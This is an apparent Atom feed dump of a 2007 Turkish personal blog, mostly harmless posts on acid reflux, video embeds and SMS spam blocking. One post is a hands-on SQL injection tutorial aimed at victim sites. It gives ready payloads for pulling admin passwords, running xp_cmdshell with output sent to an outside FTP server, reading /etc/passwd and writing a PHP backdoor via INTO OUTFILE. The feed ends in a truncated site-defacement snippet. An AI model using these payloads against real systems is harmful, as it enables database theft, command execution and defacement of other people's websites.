rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5255043838959294624/posts/default/7880066620029006330'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5255043838959294624/posts/default/7880066620029006330'/><link rel='alternate' type='text/html' href='http://ynlzbn.blogspot.com/2007/04/ekim-hatalar.html' title='çekim hataları'/><author><name>ynlzbn</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='32' src='http://img504.imageshack.us/img504/299/130x130424566546vd6.jpg'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://bp2.blogger.com/_-KqcQ8itj2c/Rh9xHARtgFI/AAAAAAAAABE/KALH4hAg2-w/s72-c/film_hatalari-4.jpg' height='72' width='72'/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5255043838959294624.post-4249162847110732878</id><published>2007-04-11T14:47:00.000+02:00</published><updated>2007-04-11T14:48:28.289+02:00</updated><title type='text'>Davs - örnek</title><content type='html'>%WINDIR%\EXPLORER.EXE ,::{20D04FE0-3AEA-1069-A2D8-08002B30309D}\::{BDEADF00-C265-11d0-BCED-00A0C90AB50F}&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5255043838959294624-4249162847110732878?l=ynlzbn.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://ynlzbn.blogspot.com/feeds/4249162847110732878/comments/default' title='Kayıt Yorumları'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=5255043838959294624&amp;postID=4249162847110732878' title='0 Yorum'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5255043838959294624/posts/default/4249162847110732878'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5255043838959294624/posts/default/4249162847110732878'/><link rel='alternate' type='text/html' href='http://ynlzbn.blogspot.com/2007/04/davs-rnek.html' title='Davs - örnek'/><author><name>ynlzbn</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='32' src='http://img504.imageshack.us/img504/299/130x130424566546vd6.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5255043838959294624.post-7921553775311177137</id><published>2007-04-11T11:22:00.000+02:00</published><updated>2007-04-11T11:26:36.843+02:00</updated><title type='text'>Reflü hakkında</title><content type='html'>Kısaca Reflü olarak anılan Gastro Özofageal Reflü (GÖR), mide içeriğinin yemek borusuna geri kaçmasıdır. Reflü hastalığı ise çeşitli sebeplerden dolayı mide içeriğinin yemek borusuna doğru geri kaçması sonucunda ortaya çıkan bir dizi şikâyetlerdir. Bu kaçak belli bir sürenin ve miktarın üstünde olunca ciddi problemlere yol açar ve bu önemli bir sağlık sorunudur. &lt;br /&gt;&lt;span style="font-weight:bold;"&gt;Reflü toplumumuzda erişkinlerin yaklaşık yüzde 20'sinde görülmektedir. &lt;/span&gt;&lt;br /&gt;&lt;br /&gt;Yemek borusunun alt ucunda mide içeriğinin yemek borusuna geçişini engelleyen bir kapak mekanizması vardır. Reflü hastalarında en sık görülen özellik bu mekanizmanın gevşekliğidir. Bu durum sıklıkla mide fıtığıyla birlikte yaşanır. Mide boşalım bozukluğu ya da bozulmuş yemek borusu hareketi bu hastalığı tetikleyen nedenlerdir.&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight:bold;"&gt;Reflü Hastalığının genel şikayetleri şöyledir:&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;    * Mide yanması (en sık),&lt;br /&gt;    * Göğüste yanma ve ekşime,&lt;br /&gt;    * Ağza gelen acı tat,&lt;br /&gt;    * Ağız kokusu,&lt;br /&gt;    * Tok karna yatıldığında şişkinlik, geğirme ve boğulma hissi,&lt;br /&gt;    * Göğüste takılma ve sıkışma hissi,&lt;br /&gt;    * Göğüs kafesine bası ve çarpıntı,&lt;br /&gt;    * Nefes almada güçlük, &lt;br /&gt;&lt;br /&gt;Daha ileri evrelerde&lt;br /&gt;&lt;br /&gt;    * Kronik Farenjit&lt;br /&gt;    * Kronik Sinüzit,&lt;br /&gt;    * Alerjik Astım Ve Diş Çürükleri&lt;br /&gt;&lt;br /&gt;Özellikle belirtmek istediğim nokta, çok sayıda hastaya farenjit, sinüzit ya da astım tanısı konulur. Hastaya tedaviler uygulanır ama hastanın şikâyetleri geçmez. Özellikle tedaviye cevap vermeyen bu tür hastalarda Reflü hastalığı değerlendirilmelidir.&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight:bold;"&gt;Reflü Hastalığının tanısı&lt;/span&gt; hastanın muayenesi ve sorgulanması (ki biz buna anamnez diyoruz) sonrası Endoskopik Muayene (Gastroskopi), Baryumlu Pasaj Grafisi, Manometri ve pH Metri denilen yöntemlerle konulur.&lt;br /&gt;&lt;br /&gt;Reflü hastalığının tedavisi doktorunuz tarafından belirlenecek olan aşağıdaki yöntemlerle gerçekleştirilir:&lt;br /&gt;&lt;br /&gt;    * Yaşam tarzı değişiklikleri,&lt;br /&gt;    * İlaç tedavisi (proton pompa baskılayıcı ilaç tedavisi, aljenik asit içeren ilaç tedavisi, prokinetik ilaç tedavisi)&lt;br /&gt;    * Cerrahi tedavi (reflünün nedeni mide fıtığı ise uygulanır)&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight:bold;"&gt;Reflüsü Olanlar Yemesin&lt;/span&gt;&lt;br /&gt; &lt;br /&gt;Yağlı yiyecekler ve kızartmalar, &lt;br /&gt;Turunçgiller ve suları, &lt;br /&gt;Gazlı ve asitli içecekler, &lt;br /&gt;Çay, kahve, &lt;br /&gt;Alkol, sigara. &lt;br /&gt;Salam, sucuk, sosis, &lt;br /&gt;Baharatlar, &lt;br /&gt;Gaz yapan besinler, &lt;br /&gt;Çiğ soğan ve sarımsak, &lt;br /&gt;Ağrı kesici, kas gevşetici ilaçlar, &lt;br /&gt;Kuruyemişler &lt;br /&gt;Çikolata. &lt;br /&gt;Sirke, limon. &lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight:bold;"&gt;Reflüsü Olanlara Öneriler&lt;/span&gt;&lt;br /&gt; &lt;br /&gt;Geceleri yatmadan iki üç saat önce günün son yemeğini yiyin. &lt;br /&gt;Yatarken sol tarafınıza doğru açılı yatın. &lt;br /&gt;Yüksek yastıkta yatın.  &lt;br /&gt;Yolculuğa çıkarken tıka basa yemeyin ve uzun araba yolculuklarında sık sık ara verin. Uçakta ise belli aralarla ayağa kalkın ve hareket edin. &lt;br /&gt;Özellikle tok karnına öne eğilme hareketlerinden kaçının. &lt;br /&gt;Masa başında ya da televizyon karşısında her zaman arkaya doğru geniş açılı oturun. &lt;br /&gt;Hiçbir zaman tıka basa yemek yemeyin. &lt;br /&gt;Öğünleriniz sık ve hafif olsun. &lt;br /&gt;Karnınızı sıkan kemerler takmayın, dar elbiseler giymeyin. &lt;br /&gt;Fazla kilolarınızdan (varsa) kurtulun. &lt;br /&gt;&lt;br /&gt;Sağlıklı günler dilerim.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5255043838959294624-7921553775311177137?l=ynlzbn.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://ynlzbn.blogspot.com/feeds/7921553775311177137/comments/default' title='Kayıt Yorumları'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=5255043838959294624&amp;postID=7921553775311177137' title='0 Yorum'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5255043838959294624/posts/default/7921553775311177137'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5255043838959294624/posts/default/7921553775311177137'/><link rel='alternate' type='text/html' href='http://ynlzbn.blogspot.com/2007/04/refl-hakknda.html' title='Reflü hakkında'/><author><name>ynlzbn</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='32' src='http://img504.imageshack.us/img504/299/130x130424566546vd6.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5255043838959294624.post-1108003138227007163</id><published>2007-04-10T08:18:00.002+02:00</published><updated>2007-04-10T08:21:01.655+02:00</updated><title type='text'>Düz duvara tırmanmak dedikleri bu olsa gerek</title><content type='html'>&lt;object width="425" height="350"&gt;&lt;param name="movie" value="http://www.youtube.com/v/4UXBfAge2pw"&gt;&lt;/param&gt;&lt;param name="wmode" value="transparent"&gt;&lt;/param&gt;&lt;embed src="http://www.youtube.com/v/4UXBfAge2pw" type="application/x-shockwave-flash" wmode="transparent" width="425" height="350"&gt;&lt;/embed&gt;&lt;/object&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5255043838959294624-1108003138227007163?l=ynlzbn.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://ynlzbn.blogspot.com/feeds/1108003138227007163/comments/default' title='Kayıt Yorumları'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=5255043838959294624&amp;postID=1108003138227007163' title='0 Yorum'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5255043838959294624/posts/default/1108003138227007163'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5255043838959294624/posts/default/1108003138227007163'/><link rel='alternate' type='text/html' href='http://ynlzbn.blogspot.com/2007/04/dz-duvara-trmanmak-dedikleri-bu-olsa.html' title='Düz duvara tırmanmak dedikleri bu olsa gerek'/><author><name>ynlzbn</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='32' src='http://img504.imageshack.us/img504/299/130x130424566546vd6.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5255043838959294624.post-5816342051260952412</id><published>2007-04-09T18:00:00.001+02:00</published><updated>2007-04-10T08:21:57.558+02:00</updated><title type='text'>düz duvara tırmanan oyuncak araba</title><content type='html'>&lt;object width="425" height="350"&gt;&lt;param name="movie" value="http://www.youtube.com/v/ByZrcSdFHHs"&gt;&lt;/param&gt;&lt;param name="wmode" value="transparent"&gt;&lt;/param&gt;&lt;embed src="http://www.youtube.com/v/ByZrcSdFHHs" type="application/x-shockwave-flash" wmode="transparent" width="425" height="350"&gt;&lt;/embed&gt;&lt;/object&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5255043838959294624-5816342051260952412?l=ynlzbn.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://ynlzbn.blogspot.com/feeds/5816342051260952412/comments/default' title='Kayıt Yorumları'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=5255043838959294624&amp;postID=5816342051260952412' title='0 Yorum'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5255043838959294624/posts/default/5816342051260952412'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5255043838959294624/posts/default/5816342051260952412'/><link rel='alternate' type='text/html' href='http://ynlzbn.blogspot.com/2007/04/dz-duvara-trmanan-oyuncak-araba.html' title='düz duvara tırmanan oyuncak araba'/><author><name>ynlzbn</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='32' src='http://img504.imageshack.us/img504/299/130x130424566546vd6.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5255043838959294624.post-7025824604948859486</id><published>2007-04-09T11:05:00.001+02:00</published><updated>2007-04-09T11:05:56.341+02:00</updated><title type='text'>çorap etiketinin arkasından atatürk resmi çıktı</title><content type='html'>&lt;object width="425" height="350"&gt;&lt;param name="movie" value="http://www.youtube.com/v/Y8WBMT94JSQ"&gt;&lt;/param&gt;&lt;embed src="http://www.youtube.com/v/Y8WBMT94JSQ" type="application/x-shockwave-flash" width="425" height="350"&gt;&lt;/embed&gt;&lt;/object&gt;&lt;br /&gt;&lt;br /&gt;pazardan alınan bir çorabın etiketinin arkasından atatürk resmi çıktı.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5255043838959294624-7025824604948859486?l=ynlzbn.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://ynlzbn.blogspot.com/feeds/7025824604948859486/comments/default' title='Kayıt Yorumları'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=5255043838959294624&amp;postID=7025824604948859486' title='0 Yorum'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5255043838959294624/posts/default/7025824604948859486'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5255043838959294624/posts/default/7025824604948859486'/><link rel='alternate' type='text/html' href='http://ynlzbn.blogspot.com/2007/04/orap-etiketinin-arkasndan-atatrk-resmi.html' title='çorap etiketinin arkasından atatürk resmi çıktı'/><author><name>ynlzbn</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='32' src='http://img504.imageshack.us/img504/299/130x130424566546vd6.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5255043838959294624.post-7285096855177352897</id><published>2007-04-06T15:31:00.000+02:00</published><updated>2007-04-06T15:39:08.463+02:00</updated><title type='text'>istemediğiniz sms ler cebinize gelmesin</title><content type='html'>merhaba,&lt;br /&gt;&lt;br /&gt;mail spam olayının verdiği rahatsızlığın üstüne şimdide cep telefonlarına sms ile spam mesaj yolma olayı ortaya çıktı.&lt;br /&gt;Bilerek veya bilmeden bir siteye veya kuruma, kayıt formunda bulunan cep telefonu bölümüne cep numaranızı eklerseniz büyük bir olasılıkla size reklam sms i gelecektir. çoğu zaman kayıt olduğunuz yerden gelecek olan bu mesajlar ilgi olduğunuz şeyler içerecektir. ancak kayıtlı sms leri satan bir firmaya cep numaranızı vermişseniz veya bu firmaya cep numaranız ulaşmışsa farklı mesajların gelmemesi için çok şanslı olmanız gerekecektir :)&lt;br /&gt;&lt;br /&gt;şimdi turkcell in size gelen mesejları filtreleyen bir sisteminden bahsedeceğim.&lt;br /&gt;ADI : MesajSeç&lt;br /&gt;MesajSeç servisi ile ilgilendiğiniz alanları seçebilir, bu alanlarla ilgili tercih ettiğiniz ürün ve kampanya tanıtım kısa mesajlarını alabilir, tercih etmediğiniz kısa mesajları ise bloke edebilirsiniz.&lt;br /&gt;&lt;br /&gt;Kullanım&lt;br /&gt;Kısa Mesajla:&lt;br /&gt;&lt;br /&gt;Cep telefonunuza gelen kısa mesajı 2780'e göndererek bir daha bu konuda size kısa mesaj gönderilmemesini sağlayabilirsiniz.&lt;br /&gt;Sesli Yanıt Sistemi:&lt;br /&gt;&lt;br /&gt;757 27 80 numaralı telefonu arayarak almak istemediğiniz mesajın konusunu belirtebilir, bir daha bu konuda size kısa mesaj gönderilmemesini sağlayabilirsiniz.&lt;br /&gt;MesajSeç Servisi'ne gönderilen kısa mesajlar ve 757 27 80 Sesli Yanıt Sistemi'ni aramak ücretsizdir.&lt;br /&gt;&lt;br /&gt;Not: Diğer operatörler üzerinden Turkcell abonelerine gönderilen kısa mesajlar -teknik olarak mümkün olmadığı için- bloke edilemeyecektir.&lt;br /&gt;&lt;br /&gt;diğer servis sağlayıcılarda da umarım bu bloke olayı çıkar...&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5255043838959294624-7285096855177352897?l=ynlzbn.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://ynlzbn.blogspot.com/feeds/7285096855177352897/comments/default' title='Kayıt Yorumları'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=5255043838959294624&amp;postID=7285096855177352897' title='0 Yorum'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5255043838959294624/posts/default/7285096855177352897'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5255043838959294624/posts/default/7285096855177352897'/><link rel='alternate' type='text/html' href='http://ynlzbn.blogspot.com/2007/04/istemediiniz-sms-ler-cebinize-gelmesin.html' title='istemediğiniz sms ler cebinize gelmesin'/><author><name>ynlzbn</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='32' src='http://img504.imageshack.us/img504/299/130x130424566546vd6.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5255043838959294624.post-6692239607186718134</id><published>2007-04-05T16:14:00.000+02:00</published><updated>2007-04-13T09:24:53.489+02:00</updated><title type='text'>sql injection anlatımı</title><content type='html'>Merhaba arkadaşlar..&lt;br /&gt;&lt;br /&gt;Sizlere Access, mssql ve mysql sistemlerinde bildiğim sql injection yollarını anlatmaya çalışacağım&lt;br /&gt;&lt;br /&gt;Access : Access sitelerde update olmaz. En başta bunu söyleyerek başlayayım. Boşuna update yapmaya çalışmayın. Access sistemlerde tablo ve kolon adlarını öğrenebileceğimiz bir yolda olmadığı için tablo ve kolon adlarını bulmak için tek yol tablo ve kolonları tahmin etmektir.&lt;br /&gt;&lt;br /&gt;Diyelim ki sitemiz www.hedefite.com/haber.asp?id=1&lt;br /&gt;&lt;br /&gt;şimdi yapacağımı union select ile bilgileri çekmeye çalışmaktır.&lt;br /&gt;&lt;br /&gt;www.hedefsite.com/haber.asp?id=1+union+select+0+from+admin&lt;br /&gt;&lt;br /&gt;bunu yazdıktan sonra eğer admin tablosu yok ise&lt;br /&gt;&lt;br /&gt;-The Microsoft Jet database engine cannot find the input table or query ’admin’. Make sure it exists and that its name is spelled correctly.&lt;br /&gt;&lt;br /&gt;var ise&lt;br /&gt;&lt;br /&gt;-The number of columns in the two selected tables or queries of a union query do not match.&lt;br /&gt;&lt;br /&gt;Şeklinde bi hata alınır. İlk hatayı aldıysak tabloyu tutturamamışız başka tablo adı denememiz gerekir. İkinci hatayı aldıysak tablo adı doğru demektir. Şimdiki işimiz kolon sayısını eşitlemek olacaktır. Hata değişene kadar 0 koymaya devam etmemiz gerekiyor.hata değiştikten sonra yada hata almazsak şimdiki işimiz kolon adlarını tahmin etmek.&lt;br /&gt;&lt;br /&gt;Örnek olarak; www.hedefsite.com/haber.asp?id=1+union+select+username,passw ord,0,0,0+from+admin&lt;br /&gt;&lt;br /&gt;Access sitelerde sql injection yaparak eğer sitenin bi admin paneli varsa onun şifresini yada bir üyelik girişi falan varsa üyelerin şifrelerini alabiliriz.&lt;br /&gt;&lt;br /&gt;Mssql : mssql sql injection için en uygun sistemdir diyebilirim. Mssql sistemlerde hataya zorlayacak karakterleri yazdığımız zaman örnek olarak : haber.asp?id=1’a unclosed hatası alıyorsak update yapabilir. Update yapmak için tablo ve kolon adlarını öğrenmek lazım&lt;br /&gt;&lt;br /&gt;Öğrenmek için having 1=1 kullanırız.&lt;br /&gt;&lt;br /&gt;www.hedefsite.com/news.asp?id=1 having 1=1&lt;br /&gt;&lt;br /&gt;Column ’news.title’ is invalid in the select list because it is not contained in an aggregate function and there is no GROUP BY clause.&lt;br /&gt;&lt;br /&gt;Gibi bi hata alırız. News tablosunda title kolonu varmış.&lt;br /&gt;&lt;br /&gt;Diğer kolon adlarını bulmak için&lt;br /&gt;&lt;br /&gt;www.hedefsite.com/news.asp?id=1 group by title having 1=1&lt;br /&gt;&lt;br /&gt;having 1=1 ‘den önce bulduğumuz kolon adlarını group by ile birlikte yazarak diğer kolon adlarını öğreniriz.&lt;br /&gt;&lt;br /&gt;www.hedefsite.com/news.asp?id=1 update tablo_adi set kolon_adi=’yazilmak istenen yazi’;--&lt;br /&gt;&lt;br /&gt;şekilde update yapılabilir.&lt;br /&gt;&lt;br /&gt;Bir başka kolon ve tablo öğrenme şekli ise şöyle&lt;br /&gt;&lt;br /&gt;www.hedefsite.com/news.asp?id=convert(int, (select top 1 name from sysobjects where xtype=’U’ and name&gt;’a’))&lt;br /&gt;&lt;br /&gt;bu yazdığımız kod ile alfabetik olarak ‘a’ karakterinden büyük olan ilk tablonun adını öğreniriz. Mesela article tablosunu verdi bize. Daha sonra&lt;br /&gt;&lt;br /&gt;www.hedefsite.com/news.asp?id=convert(int, (select top 1 name from sysobjects where xtype=’U’ and name&gt;’article’))&lt;br /&gt;&lt;br /&gt;yazarak article tablosundan daha sonra gelen tabloyu buluruz bu şekilde tüm tablo adlarını bulabiliriz.&lt;br /&gt;&lt;br /&gt;www.hedefsite.com/news.asp?id= convert(int, (select top 1 name from syscolumns where colid=COLUMNID and id=(select top 1 id from sysobjects where xtype=’U’ and name=’kolonlarını öğrenmek istediğimiz tablo adı’)))&lt;br /&gt;&lt;br /&gt;yazarak biraz önce adını öğrendiğimiz tablonun kolon adlarını öğrenebiliriz. COLUMNID yazan yere 1 , 2 , 3 yazarak sırayla tabloda bulunan kolonları alfabetik olarak öğrenebiliriz.&lt;br /&gt;&lt;br /&gt;Having 1=1 ile sadece 1 tablonun adı ve kolon adları öğrenilebilirken bu yöntemle tüm tablo ve kolonlar öğrenilebilir.&lt;br /&gt;&lt;br /&gt;Uygulanacak başka bir yol ise veri tabanı kullanıcısı dbo yani admin ise veri tabanında cmd komutu çalıştırabilir bunun sonucunu bir ftp’ye yazdırabiliriz yada istediğimiz bir sorgu sonucunu yine ftp’ye yazdırabiliriz. Burada ihtiyacımız olan yazılabilir ve şifresiz ulaşılabilen bir ftp server ve veri tabanı kullanıcısının dbo olmasıdır. Zaten bu yöntemi video ile anlatmıştım.&lt;br /&gt;&lt;br /&gt;Bir sorgu sonucunu ftp’ye yazdırma&lt;br /&gt;&lt;br /&gt;www.hedefsite.com/news.asp?id=1;exec+sp_makewebtask+’ftpserv er/a.html’,’select+*+from+tablo_adi’;--&lt;br /&gt;&lt;br /&gt;cmd komutu sonucunu ftp’ye yazdırma&lt;br /&gt;&lt;br /&gt;www.hedefsite.com/news.asp?id=1;exec master..xp_cmdshell ’dir c:\\\\ &gt; test1.txt’;drop table deneme1;CREATE TABLE deneme1 (txt varchar(8000));BULK INSERT deneme1 FROM ’test1.txt’;exec+sp_makewebtask+’ftpserver/a.html’,’select+* +from+deneme1’;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;başka uygulanacak bir yöntem ise serverda dosya oluşturmaktır. Bu şekilde servera fso upload edebilir yada direk index atabiliriz. Yine veri tabanı kullanıcısının admin olması gerekmektedir. Yöntemi kısaca anlatayım. Bununla ilgili 2 video çekmiştim zaten. Şimdi bizim tablodaki verileri dosyaya yazdırma şansımız var. O zaman biz bir tablo oluşturup sonra bu tablo içine oluşturmak istediğimiz dosyaların insert edersek daha sonra bu tablodaki verileri dosyaya yazdırarak serverda istediğimiz dosyayı oluşturabiliriz. Burada dosyaları hex koduna çevirerek insert etmek yararımıza olacaktır çünkü dosyaların içinde bulunan verileri injectionı muhtemelen bozacaktır. Bununla ilgili 2 videom zaten var onlara bakarak çok daha iyi anlayabilirsiniz.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Mysql : bir başka veri tabanı sistemi mysql’dir. Büyük bi çoğunlukla php siteler kullanır. Şunu en başta söyliyeyim php’de update olmaz. Php sitelerde boşuna update denemeyin.&lt;br /&gt;&lt;br /&gt;Yapabileceklerini eğer veri tabanı kullanıcısı yetkili değil ise Access ile yapacaklarınızdan ileri geçemez. Union select ile veri çekebilirsiniz. Mysqlde injection kelimeleri arasına /**/ konur. Aslında bu bir şart değildir ama mysqlde /**/ sonlandırı anlamına geliyor sanırım.&lt;br /&gt;&lt;br /&gt;www.hedefsite.com/news.php?id=-1/**/UNION/**/SELECT/**/0,1,2 ,3/*&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;bu şekilde kolon sayısını tutturmaya çalışıyoruz. Dikkat ederseniz kolon sayısını tutturmaya çalışırken tablo adı yazmamıza gerek yok.&lt;br /&gt;&lt;br /&gt;Eğer yetkisimiz var ise mysql yada information_schema veri tabanlarından veri çekebiliriz. Mysql.user tablosunda kullanici adi ve şifre bilgileri bulunur. Tabi şifre hashlenmiş olarak tutulur. 4.1 öncesi sürümlerde 16 byte ile şifreliyorlardı 4.1 ve sonrası sürümlerde 41 byte ile şifreleniyor. Bu şifreler ancak brute force ile kıralabilir. information_schema.tables tablosundan ise tablo ve kolon adlarını öğrenebilirsiniz.Ayrıca load_file() fonksiyonu ile dosya okuyabiliriz.&lt;br /&gt;&lt;br /&gt;www.hedefsite.com/news.php?id=-1/**/UNION/**/SELECT/**/0,1, load_file(’/etc/passwd’),3/*&lt;br /&gt;&lt;br /&gt;mesela bu şekilde etc passwd dosyasını okuyabiliriz. Eğer magic_quotes_gpc özelliği on ise ‘ karakteri /’ dönüştürüleceği için text olarak yazarak bu yöntem çalışmayacaktır. O zaman char() fonksiyonunu kullanıyoruz. /etc/passwd yazısının karakterlerinin tek tek ascii kodlarını yazarak bu yöntemi uygulayabiliriz.&lt;br /&gt;&lt;br /&gt;www.hedefsite.com/news.php?id=-1/**/UNION/**/SELECT/**/0,1, char(47,101,116,99,47,112,97,115,115,119,100),3/*&lt;br /&gt;&lt;br /&gt;bu yötemi ayrıca sanal dizin biliniyorsa sitenin dosyalarını okumak içinde kullanabiliriz.&lt;br /&gt;&lt;br /&gt;/home/www/public_html/ gibi.&lt;br /&gt;&lt;br /&gt;Mysql’dede sorgu sonucunu bir dosyaya yazdırma olayı var. Fakat sanal dizin bilinmek zorundadır. Bu işi into outfile komutuyla yaparız.&lt;br /&gt;&lt;br /&gt;www.hedefsite.com/news.php?id=1/**/union/**/select/**/0,0,’d osyaya_yazdıralacak_kod ’/**/from/**/users/**/**/INTO/**/OUTFILE/**/’/home/www/www.h edefsite.com/public_html/xxx.php’/*&lt;br /&gt;&lt;br /&gt;burada ‘dosyaya yazdırlacak kod yerine’ rfi yiyen küçük bir kod parçacığı yazılarak kendimize bir rfi yolu açabiliriz.&lt;br /&gt;&lt;br /&gt;Umarım yararlı olmuşumdur.&lt;br /&gt;&lt;br /&gt;Bolivar…&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5255043838959294624-6692239607186718134?l=ynlzbn.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://ynlzbn.blogspot.com/feeds/6692239607186718134/comments/default' title='Kayıt Yorumları'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=5255043838959294624&amp;postID=6692239607186718134' title='0 Yorum'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5255043838959294624/posts/default/6692239607186718134'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5255043838959294624/posts/default/6692239607186718134'/><link rel='alternate' type='text/html' href='http://ynlzbn.blogspot.com/2007/04/sql-injection-anlatm.html' title='sql injection anlatımı'/><author><name>ynlzbn</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='32' src='http://img504.imageshack.us/img504/299/130x130424566546vd6.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5255043838959294624.post-2574935209975732818</id><published>2007-04-05T13:57:00.001+02:00</published><updated>2007-04-05T13:57:57.532+02:00</updated><title type='text'>resim dosyasında dosya ya da mesaj saklamak</title><content type='html'>öncelikle bir resim dosyası kaydediyorsunuz bizimki x.jpg olsun ardındanda saklamak istediğiniz dosyayı sıkıştırarak kaydediyorsunuz bu dosyamıza da y.rar diyelim..şimdi çalıştırdan cmd yazarak komut satırımıza düşüyoruz daha sonra dosyalarımızın bulunduğu klasöre gelerek"copy /b x.jpg + y.rar z.jpg" yazıyoruz aynı klasörde oluşan z.jpg yi açtığınızda resmi görebileceksiniz aynı zamanda dosyayı winrar ile açarsanız dosyanızında orda olduğunu göreceksiniz..herhangi bir txt dosyasını rarlamadan aynı işlemi yaparsanız oluşan dosyayı notepad ile açtığınızda mesajınız açılan not defterinin sonunda görünecektir.. &lt;br /&gt; &lt;br /&gt;kaynak : www.wardom.org&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5255043838959294624-2574935209975732818?l=ynlzbn.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://ynlzbn.blogspot.com/feeds/2574935209975732818/comments/default' title='Kayıt Yorumları'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=5255043838959294624&amp;postID=2574935209975732818' title='0 Yorum'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5255043838959294624/posts/default/2574935209975732818'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5255043838959294624/posts/default/2574935209975732818'/><link rel='alternate' type='text/html' href='http://ynlzbn.blogspot.com/2007/04/resim-dosyasnda-dosya-ya-da-mesaj.html' title='resim dosyasında dosya ya da mesaj saklamak'/><author><name>ynlzbn</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='32' src='http://img504.imageshack.us/img504/299/130x130424566546vd6.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5255043838959294624.post-5590334238003959740</id><published>2007-04-05T13:51:00.001+02:00</published><updated>2007-04-05T14:06:49.265+02:00</updated><title type='text'>index atma-cıklar...</title><content type='html'>siteye girişde merhaba dedirtin :) &lt;br /&gt;&lt; s c r i p t &gt;document.body.innerHTML = "merhaba";&lt; /s c r i p t &gt;&lt;br 